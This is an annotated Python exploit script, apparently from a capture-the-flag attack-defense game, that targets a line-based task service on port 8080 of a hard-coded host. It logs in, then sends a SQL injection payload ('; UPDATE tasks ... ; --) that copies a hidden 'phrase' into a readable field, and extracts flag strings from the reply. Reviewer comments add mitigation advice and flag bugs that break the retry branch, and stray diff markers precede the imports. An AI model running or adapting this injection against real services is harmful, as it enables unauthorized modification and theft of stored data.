- import socket
- import re
# Pattern for the strings attack() extracts from the final service reply:
# five groups of lowercase hex digits (8-4-4-4-12) joined by hyphens.
FLAG_FORMAT = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"

# Not referenced anywhere in the visible part of the script.
except_list = list()

# Defined but never applied to a socket in the visible code, so the
# connect()/recv() calls below block without a deadline.
timeout = 5
def attack(ip, storage):
    """Talk to the line-based service on ``ip``:8080 and return matched flag strings.

    The routine opens several short TCP sessions in sequence. Every prompt is
    read with a single ``recv`` whose result is mostly discarded, and every
    answer is sent as text followed by a newline.

    NOTE(review): the paste lost its indentation. The nesting of the ``if`` and
    ``while`` bodies below is reconstructed and must be confirmed against the
    original script.

    Defender's reading: one session sends a first-line value that carries a
    quote and a SQL ``UPDATE`` statement. That only has an effect if the
    service builds its query by string concatenation; bound parameters on the
    service side (and a database account that cannot UPDATE from the login
    path) remove the weakness. First-line inputs containing ``'``, ``;`` or
    ``--`` are a usable detection signal.

    Args:
        ip: Host to connect to; the port is fixed at 8080.
        storage: Opaque value returned unchanged as the second tuple element.

    Returns:
        ``(matches, storage)`` where ``matches`` is the list produced by
        ``re.findall(FLAG_FORMAT, ...)`` on the last reply.
    """
    limit = 1024
    name = 'k'
    # No settimeout() is called on any socket in this function, so the
    # module-level ``timeout`` has no effect here.
    sock = socket.socket()
    sock.connect((ip, 8080))
    # Session 1: the same value is sent in answer to two consecutive prompts
    # (presumably login and password - confirm against the service).
    sock.recv(limit)
    sock.send(name.encode())
    sock.send('\n'.encode())
    sock.recv(limit)
    sock.send(name.encode())
    sock.send('\n'.encode())
    # NOTE(review): ``str`` shadows the builtin for the rest of the function.
    # A single recv() is assumed to hold the whole reply; TCP does not promise that.
    str = sock.recv(limit).decode()
    if str.find('Incorrect') != -1:
        # Reconnect with a longer name until the reply stops containing 'Incorrect'.
        while str.find('Incorrect') != -1:
            name = name + 'k'
            sock.close()
            sock = socket.socket()
            sock.connect((ip, 8080))
            # NOTE(review): ``limit`` is an int, so ``limit.encode()`` raises
            # AttributeError; this branch cannot complete as written.
            sock.recv(limit.encode())
            # NOTE(review): ``name`` is passed as str here, unlike the
            # ``name.encode()`` calls elsewhere; Python 3 sockets require bytes.
            sock.send(name)
            sock.send('\n'.encode())
            sock.recv(limit.encode())
            sock.send(name)
            sock.send('\n'.encode())
            str = sock.recv(limit).decode()
    print('correct')
    if str.find('role?') != -1:
        # Answer the extra 'role?' prompt when the service asks it.
        sock.send('r'.encode())
        sock.send('\n'.encode())
        sock.recv(limit)
    print('get')
    sock.send('1'.encode())
    sock.send('\n'.encode())
    str = sock.recv(limit).decode()
    # The last space-separated token of the reply is used as a task id. It is
    # service output and is concatenated below without any validation.
    last_task = str.split(' ')[-1]
    sock.recv(limit)
    sock.close()
    sock = socket.socket()
    sock.connect((ip, 8080))
    sock.recv(limit)
    # Session 2: the first-line answer is replaced by a quote-terminated string
    # carrying an UPDATE that copies ``phrase`` into ``description`` for the row
    # whose id is ``last_task``. Presumably the service interpolates this field
    # into SQL text; a parameterized query would treat it as plain data.
    str = "'; UPDATE tasks SET(description) = (SELECT phrase FROM tasks WHERE id = " + last_task + ") WHERE id = " + last_task + "; -- "
    sock.send(str.encode())
    sock.send('\n'.encode())
    sock.recv(limit)
    sock.send(name.encode())
    sock.send('\n'.encode())
    sock.recv(limit)
    sock.close()
    sock = socket.socket()
    sock.connect((ip, 8080))
    # Session 3: same two-prompt exchange as session 1, then '1' followed by the task id.
    sock.recv(limit)
    sock.send(name.encode())
    sock.send('\n'.encode())
    sock.recv(limit)
    sock.send(name.encode())
    sock.send('\n'.encode())
    sock.recv(limit)
    sock.send('1'.encode())
    sock.send('\n'.encode())
    sock.recv(limit)
    sock.send(last_task.encode())
    sock.send('\n'.encode())
    # NOTE(review): this last socket is never closed; the function returns
    # straight from the final recv().
    return (re.findall(FLAG_FORMAT, sock.recv(limit).decode()), storage)
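if __name__ == "__main__":
    # Guarded so that importing this module for its attack() function does not
    # open network connections as an import side effect. When run as a script
    # it performs one run against the hard-coded host and prints only the
    # list of matches (the first element of the returned tuple).
    print(attack('10.218.15.2', 'null')[0])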